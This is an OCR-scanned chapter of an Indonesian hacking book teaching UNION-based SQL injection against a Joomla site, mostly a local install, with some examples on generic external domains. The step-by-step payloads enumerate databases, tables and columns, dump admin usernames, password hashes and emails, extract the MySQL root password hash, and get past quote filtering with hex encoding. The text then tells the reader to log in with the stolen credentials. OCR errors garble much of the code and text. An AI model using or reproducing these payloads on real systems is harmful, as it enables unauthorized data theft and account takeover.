77 UNION SELECT 
0,0,0,0,0,0,0,0,@@version,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0- - 


MENENTUKAN VERSI SOL 


Walaupun pada umumnya step yang dilakukan untuk melakukan 
aksi SAL Injection hampir sama untuk setiap versi SAL. Namun, 
dengan mengetahui versi SAL ini akan mempermudah kerja Anda 
dalam melakukan SOAL Injection nantinya. Karena pada beberapa 
versi, S@L akan memiliki karekteristik yang sedikit berbeda. 
Misalnya, pada SOAL versi 4 dengan SOAL versi 5, akan berbeda cara 
mendapatkan informasi yang kita inginkan. Kita akan membicarakan 
hal ini pada bagian tersendiri dalam bab Blind SAL Injection. 
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Kita kembali pada pokok permasalahan, bagaimana menentukan versi SOL. 
Perintah yang akan kita gunakan adalah hampir sama dengan sebelumnya. 
Hanya saja kita akan menambahkan perintah @@version pada bagian angka 
yang tampil, dalam hal ini angka error 9. 


Misalnya, dari URL sebelumnya adalah seperti berikut ini. 


http://localhost/joomla/index.php/hacking-fag?view—category&id—-77 
UNION SELECT 
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 
4,25,26-- 

Yang harus kita lakukan adalah mengubah angka 9 dengan @aversion. 
http://localhost/joomla/index.php/hacking-fag?view—category&id—-77 
UNION SELECT 
1,2,3,4,5,6,7,3,@@version,10,11,12,13,14,15,16,17,18,19,20,21, 
22,23,24,25,26-- 


Hasilnya, pada gambar di bawah ini terlihat saya menggunakan versi 5.1.41. 
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Gambar 4.28 Versi MySgl 
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Apabila dari langkah sebelumnya Anda memperoleh beberapa angka 
error maka Anda bisa menggunakan perintah @@version pada salah 
satu angka. Misalnya, angka yang muncul adalah 2 dan 3 maka kita 
bisa menggantikan angka 2 atau 3 lalu menyisipkan perintah 
@@version pada bagian tersebut. Karena pada kedua nomor itulah 
merupakan bagian yang menjadi sasaran SOAL Injection. Seperti 
berikut ini: 


http://www.situsweb.com/product.php?id--1 UNION SELECT 
1 @@version,3,4 -- 


Atau: 

http://www.situsweb.com/product.php?id--1 UNION SELECT 
1,2,@@version,4 -- 

Misalnya, kita menyisipkan perintah @@version pada nomor 2. 


http://www.situsweb.com/product.php?id--1 UNION SELECT 
1 @@version,3,4 -- 


Maka hasil tampilannya seperti berikut ini. 


—jp- 5.0.51a-24-lenny5-log 


Sinopsis y ficha tecnica Critica Galeria de fotos 


Buscador Cine 
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VIWI|/XI|/YI|Zz | Todos 


Gambar 4.29 Versi MySgl pada angka error 2 


Sekarang kita lihat perbedaannya dengan mencoba lagi mema- 
sukkan perintah @@version pada nomor 3. 


http://www.situsweb.com/product.php?id--1 UNION SELECT 
1,2,@@version,4 -- 


Maka hasil tampilannya seperti berikut ini. 
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Gambar 4.30 Versi MySgl pada angka error 3 


Dari dua gambar di atas, kita peroleh versi SAL yang digunakan 
adalah 5.0.51a-24-lenny5-log, atau umum disebut dengan versi 5 
saja. 


Selain menggunakan perintah @@version untuk menampilkan versi 
SOAL, kita juga bisa menggunakan perintah version() atau 
@@global.version. 


Pada beberapa kasus tertentu terdapat situs web yang tidak mau 
menampilkan versi SAL. Gunakanlah nilai hexadesimal, seperti 
berikut ini: unhex(hexM)). 


Dalam sebuah URL adalah sebagai berikut: 


http://localhost/joomla/index.php/hacking-fag?view-categorySid-- 
77 UNION SELECT 
1,2,3,4,5,6,7,8,unhex(hex(@@version)),10,11,12,13,14,15,16,17,18, 
19,20,21,22,23,24,25,26-- 


Berikut beberapa contoh versi MySgl: 


e 4.1-log 

o 4.3 

e 51.52 

e 5.0.75-0ubuntu10 
e 5.077 
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e 5.0.91-log 
e 5.0.92-community-log 


Untuk tambahan informasi, perlu Anda ketahui, dari hasil versi yang 
ditampilkan kita juga dapat menebak sistem operasi apa yang 
digunakan. Misalnya, apabila pada tampilan versi terdapat pesan 
—nt-log ataupun -log lainnya, hal ini menandakan bahwa server 
tersebut menggunakan sistem operasi Windows. Namun, saat ini 
terkadang hasil yang ditampilkan akan menyembunyikan teks 
—nt-log tersebut. Sedangkan untuk versi lain Oubuntu10, menanda- 
kan server menggunakan sistem operasi Linux Ubuntu. 


MENENTUKAN NAMA DATABASE 


Menentukan nama database pada dasarnya bukanlah sesuatu yang 
begitu penting dalam melakukan aksi SAL Injection. Tetapi 
setidaknya hal ini bisa menjadi tambahan pengetahuan bagi Anda 
untuk meningkatkan kemampuan dalam memahami SOAL Injection. 
Dengan mengetahui nama sebuah database, bisa saja Anda man- 
faatkan untuk hal lainnya. 


Perintah yang digunakan untuk menemukan database adalah: 
group concat(schema name): 


http://localhost/joomla/index.php/hacking-fag? view—category&id—-77 
UNION SELECT 

1,2,3,4,5,6,7,8,group concat(schema name),10,11,12,13,14,15,16,17,18,1 
9,20,21,22,23,24,25,26 FROM information schema.schemata-- 


Ingat, kita menyisipkan perintah group concat(schema name) pada bagian 
angka error yang memiliki vulnerable. Lalu pada akhir perintah kita 
tambahkan FROM information schema.schemata. 


Pembahasan mengenai “information schema” akan kita bicarakan dalam 
bagian tersendiri. 


Berikut ini contoh hasil pemakaian perintah di atas, terdapat beberapa buah 
nama database. 
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Gambar 4.31 Nama database terlihat 


Nama databasenya adalah teks yang terdapat setelah 
information schema,nama-database. 


Anda juga bisa menggunakan perintah concat(database ()) untuk menam- 
pilkan nama database yang sedang digunakan. 


http://localhost/joomla/index.php/hacking-fag? view—category&id—-77 
UNION SELECT 
1,2,3,4,5,6,7,8,concat(database()),10,11,12,13,14,15,16,17,18,19,20,21,22,2 
3,24,25,26 FROM information schema.schemata— 
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Gambar 4.32 Nama database 


Perintah di atas juga bisa Anda modifikasi menjadi: 


http://localhost/joomla/index.php/hacking-fag? view—category&id—-77 
UNION SELECT 
1,2,3,4,5,6,7,8,databasel(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 
26 FROM information schema.schemata-- 


Apabila dalam proses, Anda memperoleh beberapa nomor target 
untuk mempercepat pekerjaan, Anda bisa menggabungkan penca- 
rian informasi menjadi beberapa pencarian sekaligus. Misalnya, kita 
akan menampilkan informasi versi SOAL sekaligus pula akan 
menampilkan nama database. Hal ini bisa dilakukan karena ada 
2 angka error yang muncul. Jadi, kedua angka error tersebut bisa 
kita manfaatkan sekaligus. Misalnya, kita akan menampilkan nama 
database pada angka error 2 dan menampilkan versi SAL pada 
angka error 3. 


http://www.situs.com/product.php?id--1 UNION SELECT 
1,concat(database ()),@@version,4 FROM 
information schema.schemata-- 
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Hasilnya bisa Anda lihat seperti contoh gambar di bawah ini. 
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Gambar 4.33 Pemakaian beberapa angka error sekaligus 


Harap diingat atau catat nama database yang Anda dapatkan 
tersebut. Karena nanti kita akan memerlukannya. Perintah lain untuk 
mencari nama database selain database() adalah: DB NAME) dan 
@@database. 


MENEMUKAN NAMA TABEL 


Apabila pada step sebelumnya Anda sudah menemukan nama 
database, sekarang kita akan mencari tahu nama tabel yang terdapat 
dalam database tersebut. Perintah yang digunakan pada dasarnya 
hampir sama dengan menentukan nama database, hanya saja 
terdapat sedikit penambahan perintah. 


Perintah yang digunakan untuk menemukan database adalah: 
group concat(table name) 


http://localhost/joomla/index.php/hacking-fag? view—category&id—-77 
UNION SELECT 
1,2,3,4,5,6,7,8,group concat(table name),10,11,12,13,14,15,16,17,18,19,2 
0,21,22,23,24,25,26  FROM information schema.tables — WHERE 
table schema—database'/)-- 


Walaupun kode atau perintah di atas terlihat panjang dan membingungkan, 
sebenarnya hal ini bisa dipahami dengan mudah. Apalagi jika Anda memiliki 
kemampuan untuk menggunakan SOL. Jadi, sangat saya sarankan juga Anda 
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mempelajari SOL. Secara ringkas, bisa saya jelaskan sebagai berikut: 
Kelompokkan "group" (GROUP. CONCAT) nama tabel (table name) secara 
bersama-sama dan ambil informasi dari (FROM) information schema.tables 


yang mana "skema tabel" (table schema) dapat ditemukan dalam database 
(database). 


Berikut ini contoh hasil perintah di atas yang menampilkan nama 
tabel. 
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Gambar 4.34 Beberapa nama tabel muncul 


Pada gambar di atas terlihat kalau nama tabelnya tidak tampil semuanya. Hal 
ini karena tempat untuk menampilkan semua nama tabel tidak mencukupi. 
Untuk menampilkan semuanya, Anda bisa mengakali dengan memilih semua 
area pada teks nama tabel tersebut kemudian salin dan paste pada Notepad 
atau MS Word. Atau cara yang lebih cepat dan gampang, Anda blok semua 
bagian dalam tampilan situs web tersebut menggunakan perintah Ctr-A 
pada keyboard lalu paste atau tempel pada MS Word. 


Berikut contoh hasil paste pada MS Word, terlihat nama tabel-tabelnya pada 
bagian yang saya beri tanda kotak. 
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Gambar 4.35 Menyalin nama tabel dalam MS Word 


Kasus seperti ini terjadi karena keterbatasan tempat untuk menampilkan 
semua isi atau nama tabel yang diperoleh. Hal ini akan tergantung pada 
posisi nomor angka error yang terjadi. Bukan berarti semua kasus akan 
seperti ini, ada juga yang menampilkan secara teratur per baris. 


Salah satu kekurangan dalam pemakaian perintah GROUP CONCAT adalah 
jumlah karakter yang mampu ditampilkan adalah maksimal 1024 karakter. 
Akibatnya, Anda akan melihat adanya nama tabel yang terpotong. Untuk 
mengatasi permasalahan tersebut, kita bisa menggunakan perintah yang 
dimodifikasi. 


http://localhost/joomla/index.php/hacking-fag? view—category&id—-77 
UNION SELECT 

1,2,3,4,5,6,7,8,table name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 
,26 FROM information schema.tables WHERE 

table schema—databasel() LIMIT 0,1— 
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Gambar 4.36 Nama tabel pertama 


Fungsi syntax di atas untuk menampilkan hanya tabel yang pertama saja. 
Terlihat pada gambar di atas diperoleh informasi bahwa kolom pertama, 
bernama jos assets. Dengan perintah yang dimodifikasi tersebut, apabila kita 
kehabisan karakter, katakanlah pada tabel ke-21 kita bisa menggunakan 
perintah: 


http://localhost/joomla/index.php/hacking-fag?view—category&id—-77 
UNION SELECT 

1,2,3,4,5,6,7,8,table name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 
,26 FROM information schema.tables WHERE 

table schema—databasel() LIMIT 20,1-- 


Seperti yang saya contohkan di atas kita akan mencari nama tabel 21, tapi 
pada guery-nya kita menuliskan 20,1 bukan 21,1. Hal ini karena perhi- 
tungannya dimulai dari 0 bukan dari 1. Sehingga untuk mencari tabel 
lainnya, misalnya 50 maka kita memasukkan guery 49,1. 


Sekarang saya akan menampilkan nama kolom yang saya peroleh dengan 
perintah GROUP CONCAT. 


jos assets,jos banner clients,jos banner tracks,jos banners,jos categories,j 
os contact details,jos content,jos content frontpage,jos content rating,jos 
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core log searches,jos extensions,jos fagbook items,jos gbufacebook faces 
jos languages,jos menu,jos menu types,jos messages,jos messages cfg,jo 
s modules,jos modules menu,jos newsfeeds,jos p 


Tabel yang pertama adalah jos assets. Sehingga pemakaian LIMIT 0,1 
adalah benar. 


Sekarang kita coba memasukkan nilai LIMIT 1,1 untuk mencocokkan 
dengan nama tabel ke-2. 


http://localhost/joomla/index.php/hacking-fag? view—category&id—-77 
UNION SELECT 

1,2,3,4,5,6,7,8,table name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 
26 FROM information schema.tables WHERE table schema—databasel) 
LIMIT 1,1- - 


Hasilnya adalah jos banner clients: juga sesuai dengan perintah 
GROUP CONCAT. 
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Gambar 4.37 Nama tabel kedua 


Sekarang perhatikan pada nama tabel yang ke-22. Di sana, nama tabelnya 
dalam kondisi terpotong, yang muncul hanyalah teks jos p. 


Oleh karena itu, kita perlu mencari tahu apa nama tabel ke-21 tersebut, 
dengan perintah: 


http://localhost/joomla/index.php/hacking-fag? view—category&id—-77 
UNION SELECT 

1,2,3,4,5,6,7,8,table name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 
26 FROM information schema.tables WHERE table schema—databasel) 
LIMIT 21,1- - 


Ternyata nama tabelnya adalah: jos peliculas config. 
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Gambar 4.38 Nama tabel ke-22 


Dengan cara yang sama pula Anda bisa mencari nama-nama untuk tabel 
lainnya, seperti nama tabel ke-22, ke-23 dan seterusnya. 


Dalam kasus Blind SOAL Injection, perintah yang digunakan adalah: 


AND SELECT SUBSTR (table name,1l,1) FROM information schema.tables 
» AT. 


MENCARI NAMA KoLom 


Anda sudah mengetahui nama sebuah tabel, sekarang kita akan 
mencari tahu nama-nama kolom yang digunakan pada tabel 
tersebut. Cobalah cari salah satu tabel yang Anda asumsikan 
mengandung informasi-informasi penting di dalamnya. Biasanya 
tabel user, users, admin, admins, login, logins, tbluser, tblusers, 
jos users, dan sebagainya. 
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Dalam kasus kita ini, tabel yang bermanfaat adalah jos users mengandung 
informasi penting di dalamnya. 


http://localhost/joomla/index.php/hacking-fag? view—category&id—-77 
UNION SELECT 

1,2,3,4,5,6,7,8,group concat(column name),10,11,12,13,14,15,16,17,18,1 
9,20,21,22,23,24,25,26 FROM information schema.columns WHERE 
table name—”jos users” -- 


Apabila dengan perintah di atas, tidak menampilkan nama kolom, gantilah 
tanda kutip dua pada bagian “nama tabel” dengan kutip tunggal. Sehingga 
URL-nya menjadi: 


http://localhost/joomla/index.php/hacking-fag?view—category&id—-77 
UNION SELECT 

1,2,3,4,5,6,7,8,group concat(column name),10,11,12,13,14,15,16,17,18,19, 
20,21,22,23,24,25,26 FROM information schema.columns WHERE 
table name—'jos users”-- 


Hasilnya akan menampilkan daftar nama-nama semua kolom yang digunakan 
pada tabel jos users”. 
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Gambar 4.39 Nama kolom 
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Walaupun di dalamnya ada banyak nama kolom lain, namun di sini kita telah 
menemukan nama kolom yang menjadi incaran kita, yaitu username dan 
password. 


Dari hasil yang ditampilkan seperti di atas, terlihat nama-nama kolom yang 
dipakai, antara lain id, name, username, email, password, usertype, block, 
sendEmail, registerDate, lastvisitDate, activation, params. 


Pada beberapa kasus yang terjadi adalah munculnya pesan error atau 
halaman situs web tidak menampilkan hasil apa pun. Hal ini terjadi karena 
sang pemilik situs web tersebut mengaktifkan fungsi Magic Ouotes untuk 
mengamankan situs web miliknya. Kasus seperti ini dapat dilewati dengan 
menggunakan kode hexa atau konverter hexa untuk mengubah teks biasa ke 
char atau hex. 


Sebagai contoh kasus kita di atas, maka kita perlu mengubah nama tabel 
Jos users menjadi karakter hexa, Anda bisa menggunakan bantuan dari: 


e  http://www.swingnote.com/tools/texttohex.php 
e  http://easycalculation.com/ascii-hex.php 
e  http://home.paulschou.net/tools/xlate/ 


Sebagai contoh di sini kita akan menggunakan bantuan dari 
http://home.paulschou.net/tools/xlate/ 


Dari situs web tersebut, masukkanlah teks yang ingin Anda ubah menjadi 
kode hexa. Dalam hal ini kita memasukkan login lalu klik tombol Encode 
dan tunggu proses encoding dilakukan. 


Kemudian perhatikan pada kotak Hexadecimal, itulah kode yang kita 
butuhkan. 
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Gambar 4.40 http://home.paulschou.net/tools/xlate 


Dari gambar di atas, terlihat bahwa kode hexa untuk kata jos users adalah ba 
6f 73 Sf 75 73 65 72 73. 


Satukan kode hexa tersebut untuk menghilangkan pembatas atau spasi, 
menjadi 6a6f735f7573657273. 


Setelah kita memperoleh kode hexa untuk kata jos users, tambahkan 
karakter Ox di depannya, sehingga menjadi: 0x6a6f735f7573657273. 


Kemudian, barulah kita memasukkannya pada URL. 


http://localhost/joomla/index.php/hacking-fag? view—category&id—-77 
UNION SELECT 

1,2,3,4,5,6,7,8,group concat(column name),10,11,12,13,14,15,16,17,18,19, 
20,21,22,23,24,25,26 FROM information schema.columns WHERE 

table name—0xbabf735f7573657273— 


Perhatikan, sebelum kode hexa terdapat kode tambahan, yaitu Ox. 
Fungsi kode Ox tersebut untuk memberi tahu server bahwa karakter 
yang dimasukkan setelah Ox adalah kode hexa. 


Apabila ada nama kolom yang terpotong atau Anda ingin mencari 
nama-nama kolom berikutnya, kita dapat menampilkannya meng- 
gunakan perintah LIMIT sama seperti kita mencari nama tabel. @uery 
LIMIT untuk mencari tabel pada posisi tertentu seperti yang telah 


"Oo 


Anda ketahui pada penjelasan sebelumnya juga bisa diterapkan 
untuk mencari nama kolom dengan aturan pemakaian yang sama. 
Sebagai contoh, dari hasil nama kolom yang ditampilkan pada 
bagian sebelumnya, saya ingin mencari tahu apa nama kolom 
setelah Password. 


http://localhost/joomla/index.php/hacking-fag? view—category&id—-77 
UNION SELECT 

1,2,3,4,5,6,7,8,column name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 
,25,26 FROM information schema.columns WHERE 

table name—”jos users” LIMIT 5,1-- 
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Gambar 4.41 Nama kolom sesuai urutan yang dicari 


MENAMPILKAN ISI DATA 


Setelah mencari tahu terdapat nama-nama kolom apa saja dalam 
sebuah tabel, sekarang waktunya bagi kita untuk menampilkan isi 
kolom alias ingin melihat data yang terdapat di dalamnya. Setelah 
Anda mendapatkan nama-nama kolom, Anda bisa memutuskan 
untuk melihat isi kolom yang mana. Sebagai contoh, di sini saya 
akan melihat isi dari kolom username, password dan email. 


Sebelum melanjutkan step ini, masih ingatkah Anda dengan nama database 
yang telah Anda peroleh dari penjelasan sebelumnya. Nama database yang 
kita peroleh sebelumnya adalah joomlaku. 


http://localhost/joomla/index.php/hacking-fag? view—category&id—-77 
UNION SELECT 

1,2,3,4,5,6,7,8,group concat(username,0x3a,password,0x3a,email),10,11, 
12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 FROM joomlaku.jos users-- 
Karakter 0x3a adalah nilai hexa untuk tanda titik dua (:). Sehingga hasilnya 
akan dikelompokkan menjadi seperti ini: username:password:email. 


Berikut ini contoh tampilan yang kita hasilkan. 
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Gambar 4.42 Nama username, password, dan email 


Berikut ini tampilan username, password, dan email. 


admin:f62c6096cae5de8e96b71716097f6117:9SM9hiOfxmBPNVgAz70Cw 
GD4rR6gVIBI:test@)llocalhost.ku 


Apabila dipisah: 
e Username: admin 


e Password: 
f62c6096cae5de8e96b71716097f6117:9SM9hiOfxmBPN VgAz70CwG 
D4rR6gVIBI 


e Email: test@localhost.ku 
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Untuk menampilkan dan melihat semua hasilnya, Anda bisa mela- 
kukan copy-paste pada MS Word sama seperti langkah sebelumnya. 


Apabila Anda beruntung maka Anda bisa melihat password dalam 
bentuk plain text. Selain itu, Anda juga akan melihat password yang 
telah diacak, seperti halnya pada gambar di atas. Untuk password 
yang diacak ini akan kita bahas dalam bab tersendiri cara mem- 
bongkarnya. 


Dan yang terakhir setelah Anda menemukan username dan 
password adalah Anda mencari halaman untuk melakukan login. 
Kemudian masuk menggunakan username dan password yang telah 
Anda dapatkan tersebut. 


URL di atas juga bisa kita ganti menggunakan concat ws dengan menem- 
patkan kode hexa pada bagian depan. 


http://localhost/joomla/index.php/hacking-fag? view—category&id—-77 
UNION SELECT 

1,2,3,4,5,6,7,8,concat ws(0x3a,username,password,email),10,11,12,13,14, 
15,16,17,18,19,20,21,22,23,24,25,26 FROM joomlaku.jos users-- 


Fungsi Concat merupakan sebuah Concatenation, atau pengga- 
bungan karakter salah satu fungsi tersebut adalah CONCAT WS 
yang merupakan bagian dari string function. Pada fungsi CONCAT, 
karakter-karakter yang ingin digabungkan tidak boleh mengandung 
tanda jeda. Itulah kenapa kode hexa sebagai simbol pemisah 
ditempatkan di depan. 


Sedikit modifikasi dari perintah di atas. Misalnya, kita telah 
mengetahui sebuah username dan ingin mencari password-nya, 
maka perintah yang digunakan adalah: 


http://localhost/joomla/index.php/hacking-fag?view-categorySid-- 
77 UNION SELECT 
1,2,3,4,5,6,7,8,(password),10,11,12,13,14,15,16,17,18,19,20,21,22, 
23,24,25,26 FROM joomlaku.jos users WHERE username-'admin'-- 
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Gambar 4.43 Password admin 


Pada beberapa kasus ada yang melarang pemakaian tanda kutip, 
maka Anda bisa mengganti bentuk perintahnya menggunakan kode 
hexa atau mengubah menjadi desimal. Perhatikan pada perintah 
sebelumnya, di mana kita menggunakan tanda kutip pada bagian 
WHERE username-'admin'. 


http://localhost/joomla/index.php/hacking-fag?view-categorySid-—- 
71 UNION SELECT 
1,2,3,4,5,6,7,8,(password),10,11,12,13,14,15,16,17,18,19,20,21,22, 
23,24,25,26 FROM joomlaku.jos users WHERE username-'admin' -- 


Ganti admin dalam bentuk hexa: 61646D696E, menjadi: 


http://localhost/joomla/index.php/hacking-fag?view-categorySid-—- 
71 UNION SELECT 
1,2,3,4,5,6,7,8,(password),10,11,12,13,14,15,16,17,18,19,20,21,22, 
23,24,25,26 FROM joomlaku.jos users WHERE 
username-0x61646D696E -- 


Atau, apabila dengan cara di atas masih saja, kita ganti dengan 
desimal dari admin adalah: 97, 100, 109, 105, 110. Lalu tambahkan 
perintah CHAR di depannya, menjadi: CHAR(97,100,109,105,110). 
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TRIK KHUSUS TABEL DAN KoLom 


Berikut ini sebuah trik di mana kita bisa menampilkan beberapa tabel 
dan kolom sekaligus. Perintah yang digunakan adalah: 


SELECT (@ FROM (SELECT(@:-0x00), (SELECT (@) FROM 
(information. schema.columns) WHERE (table schema»-@) AND 
(MIN (@:-CONCAT(@,0OxOa,' | 'table schema,' | -',table name,' - 
column. name))))x 


Dalam URL menjadi: 


http://localhost/joomla/index.php/hacking-fag? view—category&id—-77 
UNION SELECT 1,2,3,4,5,6,7,8, (SELECT (@) FROM 
(SELECT(@:-0x00), (SELECT (@) FROM 

(information schema.columns) WHERE (table schema--@) AND 
(@)IN (@:-CONCAT(@,0x0a,' | ',table schema,' | »',table name,' » 
' column name))))x),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 


- - 
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Gambar 4.44 Tabel dan kolom 
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Perintah lain yang bisa digunakan untuk hal yang sama adalah: 


SELECT MID (GROUP CONCAT (0x3c62723e, 0x5461626c653a20, 

table name, 0x3c62723e, 0x436f6c7564d6e3a20, column name ORDER BY 
(SELECT version FROM information schema.tables) SEPARATOR 
0x3c62723e),1,1024) FROM information schema.columns 


Sekarang, bagaimana kita menemukan sebuah tabel yang 
mengandung atau memiliki kolom dengan kriteria tertentu. Misalnya, 
kita akan mencari tabel apa saja yang memiliki kolom “username'. 


Perintah yang digunakan adalah: 


SELECT table name FROM information schema.columns WHER 
column name - 'kata atau kriteria yang dicari ': 


Untuk mencari tabel yang memiliki kolom username, maka 
perintahnya menjadi: 


SELECT table name FROM information schema.columns WHER 
column name - 'username': 


Dalam URL menjadi: 


http://localhost/joomla/index.php/hacking-fag?view-categorySid-- 
77 UNION SELECT 

1,2,3,4,5,6,7,8,(table name),10,11,12,13,14,15,16,17,18,19,20,21,2 
2,23,24,25,26 FROM information schema.columns WHERE. 

column name - 'username'— 


Perhatikan hasil yang ditampilkan di bawah ini, ternyata ada banyak 
tabel yang di dalamnya terdapat kolom dengan nama username, 
yaitu userid, tabel3, ws session, ws users, jos session, jos users, 
servers, pma history, penting, dan aku. 
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Gambar 4.45 Mencari kolom username dalam beberap tabel 


Sebagai contoh lain, misalnya kita akan mencari sebuah tabel yang 
berisikan kata "user' di dalamnya. Perintah yang digunakan adalah: 


SELECT table name FROM information schema.columns WHERE 
column name LIKE '$usert': 


Dalam sebuah URL: 


http://localhost/joomla/index.php/hacking-fag?view-category Sid-- 
77 UNION SELECT 

1,2,3,4,5,6,7,8,(table name),10,11,12,13,14,15,16,17,18,19,20,21,2 
2,23,24,25,26 FROM information schema.columns WHERE 

column name LIKE 'fbuser'-- 


Berikut contoh hasil yang ditampilkan. 
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9) Hacking FAO - Mozilla 
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Gambar 4.46 Mencari tabel yang mengandung kata user 


Sedangkan perintah berikut ini berguna untuk mencari kolom dari 
tabel manapun yang memiliki kata "user. 


SELECT column name FROM information schema.columns WHERE 
table name LIKE 'Susers': 


URL-nya adalah: 


http://localhost/joomla/index.php/hacking-fag?view-category Sid-—- 
77 UNION SELECT 

1,2,3,4,5,6,7,8,group concat( column. name),10,11,12,13,14,15,16, 
17,18,19,20,21,22,23,24,25,26 FROM information schema.columns 
WHERE table name LIKE 'Ssuser?6'-- 


(@) Hacking FAO - Mozilla Firefox - 


7? Joomla!" 


Open Source Content Management 


You are here: Home » Hacking FAO 


About Joomla! 


Getting Started 


Using Joomla! 


The Joomla! Project 


The Joomla! Community 


This Site .1 


Done 


Gambar 4.47 Mencari kolom yang mengandung kata user 


HAL-HAL KRUSIAL SEPUTAR DATABASE 


Dari prosedur yang telah saya jelaskan sebelumnya, mulai dari 
melakukan tes vulnerabilitas hingga menemukan username dan 
password dalam sebuah tabel. Pada dasarnya itu sudah cukup dalam 
melakukan SAL Injection, hanya saja ada beberapa hal krusial 
mengenai database yang bisa diperoleh melalui SAL Injection. 


Salah satunya adalah bagaimana kita mengetahui username dari 
MySgl itu sendiri dengan penambahan perintah current user(). Untuk 
melakukan hal ini: 

http://localhost/joomla/index.php/hacking-fag? view—category&id—-77 
UNION SELECT 

1,2,3,4,5,6,7,8,current user(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 
25,26 FROM mysgl.user-- 

Dari hasil yang dilihatkan pada gambar di bawah ini, nama user MySgl yang 
digunakan adalah root. 
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(B) Hacking FAO - Mozilla Firefox 
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Gambar 4.48 Username MySgl 


Selain wmmenggunakan perintah current user(), session. user), 
@Ouser, dan user/). 


Dari username MySgl yang kita peroleh tersebut, kita juga bisa melihat 
password untuk MySgl-nya. 


http://localhost/joomla/index.php/hacking-fag? view—category&id—-77 
UNION SELECT 1,2,3,4,5,6,7,8,CONCAT WS(0x3A, user, 
password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 FROM 
mysgl.user WHERE user - 'root'-- 

(@) Hacking FAO - Mozilla Firefo 

G Ti Ha —-— — -. 21 aa - FROM mysgl.user WHERE user - 'root'-- 


(Bi Most Visited (“) Getting Started (x/) Latest Headlines '“) Login Domain s4e Pusat Pengumuman C... 
|| @ Hacking FAO | 4: | 


Fontsize Bigger | Reset | Smaller| | Search. 
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Open Source Content Management 


You are here: Home » Hacking FAO 
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Getting Started 


Using Joomla! 


Done 


Gambar 4.49 Password root 
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Kini kita akan mencari tahu aplikasi apa yang digunakan dalam 
manajemen database. 


http://localhost/joomla/index.php/hacking-fag?view-categorySid-—- 
71 UNION SELECT 
1,2,3,4,5,6,7,8,(db),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 
25,26 FROM mysgl.db-- 


Atau: 


http://localhost/joomla/index.php/hacking-fag?view-categorySid-—- 
71 UNION SELECT 
1,2,3,4,5,6,7,8,concat(db),10,11,12,13,14,15,16,17,18,19,20,21,22, 
23,24,25,26 FROM mysgl.db-- 


Hasilnya menampilkan bahwa aplikasi database-nya adalah 
phpMyAdmin. 


—- 
(@) Hacking FAO - Mozilla Firefox 
File Edit View History Bookmarks Tools Help 


| & 8,(db),10,11,12,13,14,15,16,17,18,19,20,21, 25,26 FROM. mysgl.db--  € 


1 @ Hacking FAO 


You are here: Home » Hacking FAO 


About Joomla! phpmyadmin 
Getting Started 


Using Joomla! 


The Joomla! Proiect 
Done 


Gambar 4.50 Aplikasi phpMyAdmin 


Untuk menampilkan informasi mengenai nama server (nama 
komputer), menggunakan syntax @@HOSTNAME. 
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(@) Hacking FAO - Mozilla Firefox 
File Edit View History Bookmarks Tools Help 


You are here: Home » Hacking FAO 


About Joomla! 
Getting Started 
Using Joomla! 


The Joomla! Project 


Done 


Gambar 4.51 Nama server 


Perintah yang memiliki yang sama dengan @@HOSTNAME adalah: 
» HOST NAME) 
e @@servername 


e  SERVERPROPERTY/) 


Terakhir, kita akan mencari tahu di mana direktori data atau tempat 
file database disimpan. Gunakan perintah @@DATADIR atau 
DATADIR(). 


http://localhost/joomla/index.php/hacking-fag?view-category Sid-—- 
71 UNION SELECT 
1,2,3,4,5,6,7,8,@@datadir,10,11,12,13,14,15,16,17,18,19,20,21,22, 
23,24,25,26 FROM mysgl.user-- 


Dari gambar di bawah ini terlihat bahwa data direktori berada pada 
Cxamppimysgl data 
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Gambar 4.52 Direktori data 


Serta masih banyak lagi yang bisa digunakan, hanya saja kita akan 
berfokus untuk SAL Injection saja. Beberapa perintah lain yang bisa 
Anda gunakan, seperti @@language untuk mengetahui bahasa yang 
digunakan, last insert id() dan connection id(). 


Sebagai penutup untuk bab ini, perlu saya sampaikan bahwa dalam 
urutan prosedur untuk melakukan SAL Injection ini, tidak semuanya 
perlu Anda lakukan secara berurut dari awal, misalnya Anda bisa 
saja melewati step melihat versi SAL atau mencari tahu nama 
database. Anda bisa saja melewati beberapa step jika diperlukan. 
Selain itu, kode perintah yang diberikan di atas adalah kode standar 
dalam kenyataannya akan ada sedikit modifikasi tergantung dari 
kasus yang dihadapi, salah satunya adalah pemakaian karakter 
enkode. Walau demikian, setidaknya dengan adanya penjelasan 
prosedur untuk melakukan SAL Injection ini, akan membantu Anda 
untuk mengetahui apa saja tindakan yang perlu dilakukan dalam 
melakukan aksi hacking dengan SAL Injection. 
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